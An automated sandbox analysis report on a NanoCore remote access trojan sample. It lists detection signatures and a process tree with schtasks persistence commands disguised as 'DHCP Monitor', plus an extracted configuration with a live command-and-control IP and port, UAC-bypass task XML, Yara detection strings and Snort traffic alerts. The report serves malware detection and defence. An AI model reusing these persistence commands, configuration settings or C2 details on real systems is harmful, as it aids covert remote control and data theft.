Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report RHK098760045678009000.exe

Overview

General Information

Sample Name:RHK098760045678009000.exe
Analysis ID:510055
MD5:8ae8a20159a1fdedd8c4937e8cc4c571
SHA1:a68c405aa1bec64c9790c321b4785c98f5c9a2a6
SHA256:bd386b60f5a095f369d4473d5f3185c226363a563f45326cea048e10f0ff403b
Tags:exeNanoCoreRAT
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Sigma detected: NanoCore
Detected Nanocore Rat
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Yara detected Nanocore RAT
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • RHK098760045678009000.exe (PID: 1744 cmdline: 'C:\Users\user\Desktop\RHK098760045678009000.exe' MD5: 8AE8A20159A1FDEDD8C4937E8CC4C571)
    • RHK098760045678009000.exe (PID: 4364 cmdline: 'C:\Users\user\Desktop\RHK098760045678009000.exe' MD5: 8AE8A20159A1FDEDD8C4937E8CC4C571)
      • schtasks.exe (PID: 2724 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpBEAC.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 2188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • dhcpmon.exe (PID: 6216 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 8AE8A20159A1FDEDD8C4937E8CC4C571)
      • schtasks.exe (PID: 5728 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpC322.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 1388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • RHK098760045678009000.exe (PID: 5820 cmdline: C:\Users\user\Desktop\RHK098760045678009000.exe 0 MD5: 8AE8A20159A1FDEDD8C4937E8CC4C571)
    • RHK098760045678009000.exe (PID: 2184 cmdline: C:\Users\user\Desktop\RHK098760045678009000.exe 0 MD5: 8AE8A20159A1FDEDD8C4937E8CC4C571)
  • dhcpmon.exe (PID: 2724 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 8AE8A20159A1FDEDD8C4937E8CC4C571)
  • dhcpmon.exe (PID: 6692 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 8AE8A20159A1FDEDD8C4937E8CC4C571)
    • dhcpmon.exe (PID: 6812 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 8AE8A20159A1FDEDD8C4937E8CC4C571)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "319d0527-f6c8-4b20-86a3-4c642aa0", "Group": "MONEY", "Domain1": "", "Domain2": "185.222.57.90", "Port": 4445, "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x111e5:$x1: NanoCore.ClientPluginHost
  • 0x11222:$x2: IClientNetworkHost
  • 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x10f4d:$a: NanoCore
    • 0x10f5d:$a: NanoCore
    • 0x11191:$a: NanoCore
    • 0x111a5:$a: NanoCore
    • 0x111e5:$a: NanoCore
    • 0x10fac:$b: ClientPlugin
    • 0x111ae:$b: ClientPlugin
    • 0x111ee:$b: ClientPlugin
    • 0x110d3:$c: ProjectData
    • 0x11ada:$d: DESCrypto
    • 0x194a6:$e: KeepAlive
    • 0x17494:$g: LogClientMessage
    • 0x1368f:$i: get_Connected
    • 0x11e10:$j: #=q
    • 0x11e40:$j: #=q
    • 0x11e5c:$j: #=q
    • 0x11e8c:$j: #=q
    • 0x11ea8:$j: #=q
    • 0x11ec4:$j: #=q
    • 0x11ef4:$j: #=q
    • 0x11f10:$j: #=q
    0000000E.00000002.314320078.00000000038D1000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x123e5:$x1: NanoCore.ClientPluginHost
    • 0x7c6f3:$x1: NanoCore.ClientPluginHost
    • 0x8fe61:$x1: NanoCore.ClientPluginHost
    • 0xa8e25:$x1: NanoCore.ClientPluginHost
    • 0x12422:$x2: IClientNetworkHost
    • 0x7c70d:$x2: IClientNetworkHost
    • 0x8fe8e:$x2: IClientNetworkHost
    • 0xa8e52:$x2: IClientNetworkHost
    • 0x15f55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    0000000E.00000002.314320078.00000000038D1000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      Click to see the 92 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      14.2.dhcpmon.exe.24f0000.4.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x1018d:$x1: NanoCore.ClientPluginHost
      • 0x101ca:$x2: IClientNetworkHost
      • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      14.2.dhcpmon.exe.24f0000.4.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xff05:$x1: NanoCore Client.exe
      • 0x1018d:$x2: NanoCore.ClientPluginHost
      • 0x117c6:$s1: PluginCommand
      • 0x117ba:$s2: FileCommand
      • 0x1266b:$s3: PipeExists
      • 0x18422:$s4: PipeCreated
      • 0x101b7:$s5: IClientLoggingHost
      14.2.dhcpmon.exe.24f0000.4.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        14.2.dhcpmon.exe.24f0000.4.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
        • 0xfef5:$a: NanoCore
        • 0xff05:$a: NanoCore
        • 0x10139:$a: NanoCore
        • 0x1014d:$a: NanoCore
        • 0x1018d:$a: NanoCore
        • 0xff54:$b: ClientPlugin
        • 0x10156:$b: ClientPlugin
        • 0x10196:$b: ClientPlugin
        • 0x1007b:$c: ProjectData
        • 0x10a82:$d: DESCrypto
        • 0x1844e:$e: KeepAlive
        • 0x1643c:$g: LogClientMessage
        • 0x12637:$i: get_Connected
        • 0x10db8:$j: #=q
        • 0x10de8:$j: #=q
        • 0x10e04:$j: #=q
        • 0x10e34:$j: #=q
        • 0x10e50:$j: #=q
        • 0x10e6c:$j: #=q
        • 0x10e9c:$j: #=q
        • 0x10eb8:$j: #=q
        0.2.RHK098760045678009000.exe.f051458.3.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0x1018d:$x1: NanoCore.ClientPluginHost
        • 0x101ca:$x2: IClientNetworkHost
        • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
        Click to see the 118 entries

        Sigma Overview

        AV Detection:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\RHK098760045678009000.exe, ProcessId: 4364, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        E-Banking Fraud:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\RHK098760045678009000.exe, ProcessId: 4364, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Stealing of Sensitive Information:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\RHK098760045678009000.exe, ProcessId: 4364, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Remote Access Functionality:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\RHK098760045678009000.exe, ProcessId: 4364, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 0000000E.00000002.314320078.00000000038D1000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "319d0527-f6c8-4b20-86a3-4c642aa0", "Group": "MONEY", "Domain1": "", "Domain2": "185.222.57.90", "Port": 4445, "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
        Multi AV Scanner detection for submitted fileShow sources
        Source: RHK098760045678009000.exeVirustotal: Detection: 29%Perma Link
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeReversingLabs: Detection: 29%
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 14.2.dhcpmon.exe.24f0000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.RHK098760045678009000.exe.f051458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.1.RHK098760045678009000.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.RHK098760045678009000.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.24a0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.dhcpmon.exe.f061458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.RHK098760045678009000.exe.3a33258.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.38d3258.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.RHK098760045678009000.exe.f040000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.RHK098760045678009000.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.1.RHK098760045678009000.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.24a0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RHK098760045678009000.exe.f041458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.f061458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.dhcpmon.exe.3823258.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.dhcpmon.exe.38a16b4.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.dhcpmon.exe.f061458.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.dhcpmon.exe.4c4428.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.RHK098760045678009000.exe.2490000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.f050000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.f061458.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.722890.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.38d3258.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.39516b4.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.dhcpmon.exe.f050000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.1.RHK098760045678009000.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.314320078.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000001.298075260.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.300740057.000000000F050000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.314003400.000000000F050000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.313620230.0000000000715000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.313348558.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.292543029.000000000F030000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.304923421.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.314060593.00000000024F2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.265580508.000000000F040000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000001.289620419.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.313999047.00000000024A0000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.327700810.0000000004960000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.327748596.00000000049A2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.327015327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.306384984.00000000025F2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.306683045.0000000003A31000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.327148918.00000000004B5000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.305718280.0000000000615000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.327594984.0000000003821000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.306281947.0000000002490000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RHK098760045678009000.exe PID: 1744, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RHK098760045678009000.exe PID: 5820, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RHK098760045678009000.exe PID: 2184, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 2724, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6216, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6692, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6812, type: MEMORYSTR
        Machine Learning detection for sampleShow sources
        Source: RHK098760045678009000.exeJoe Sandbox ML: detected
        Machine Learning detection for dropped fileShow sources
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJoe Sandbox ML: detected
        Source: 14.2.dhcpmon.exe.24f0000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 14.2.dhcpmon.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 23.2.dhcpmon.exe.400000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 14.1.dhcpmon.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 11.1.RHK098760045678009000.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 23.1.dhcpmon.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 11.2.RHK098760045678009000.exe.400000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 11.2.RHK098760045678009000.exe.25f0000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 23.2.dhcpmon.exe.49a0000.8.unpackAvira: Label: TR/Dropper.MSIL.Gen7

        Compliance:

        barindex
        Detected unpacking (overwrites its own PE header)Show sources
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeUnpacked PE file: 11.2.RHK098760045678009000.exe.400000.1.unpack
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 14.2.dhcpmon.exe.400000.0.unpack
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 23.2.dhcpmon.exe.400000.1.unpack
        Source: RHK098760045678009000.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
        Source: Binary string: wntdll.pdbUGP source: RHK098760045678009000.exe, 00000000.00000003.259694441.000000000F090000.00000004.00000001.sdmp, RHK098760045678009000.exe, 00000008.00000003.279990371.000000000F080000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000003.295121161.000000000F0A0000.00000004.00000001.sdmp, dhcpmon.exe, 00000015.00000003.309071535.000000000F230000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: RHK098760045678009000.exe, 00000000.00000003.259694441.000000000F090000.00000004.00000001.sdmp, RHK098760045678009000.exe, 00000008.00000003.279990371.000000000F080000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000003.295121161.000000000F0A0000.00000004.00000001.sdmp, dhcpmon.exe, 00000015.00000003.309071535.000000000F230000.00000004.00000001.sdmp
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,0_2_00405E93
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054BD
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 8_2_00405E93 FindFirstFileA,FindClose,8_2_00405E93
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 8_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,8_2_004054BD
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 8_2_00402671 FindFirstFileA,8_2_00402671
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_2_00404A29 FindFirstFileExW,11_2_00404A29
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_1_00404A29 FindFirstFileExW,11_1_00404A29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_2_00404A29 FindFirstFileExW,14_2_00404A29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_1_00404A29 FindFirstFileExW,14_1_00404A29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_2_00404A29 FindFirstFileExW,23_2_00404A29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_1_00404A29 FindFirstFileExW,23_1_00404A29

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49748 -> 185.222.57.90:4445
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49749 -> 185.222.57.90:4445
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49750 -> 185.222.57.90:4445
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49753 -> 185.222.57.90:4445
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49754 -> 185.222.57.90:4445
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49755 -> 185.222.57.90:4445
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49757 -> 185.222.57.90:4445
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49758 -> 185.222.57.90:4445
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49759 -> 185.222.57.90:4445
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49787 -> 185.222.57.90:4445
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49803 -> 185.222.57.90:4445
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49807 -> 185.222.57.90:4445
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49808 -> 185.222.57.90:4445
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49817 -> 185.222.57.90:4445
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49834 -> 185.222.57.90:4445
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49835 -> 185.222.57.90:4445
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49836 -> 185.222.57.90:4445
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49841 -> 185.222.57.90:4445
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49842 -> 185.222.57.90:4445
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49843 -> 185.222.57.90:4445
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs:
        Source: Malware configuration extractorURLs: 185.222.57.90
        Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
        Source: global trafficTCP traffic: 192.168.2.7:49748 -> 185.222.57.90:4445
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
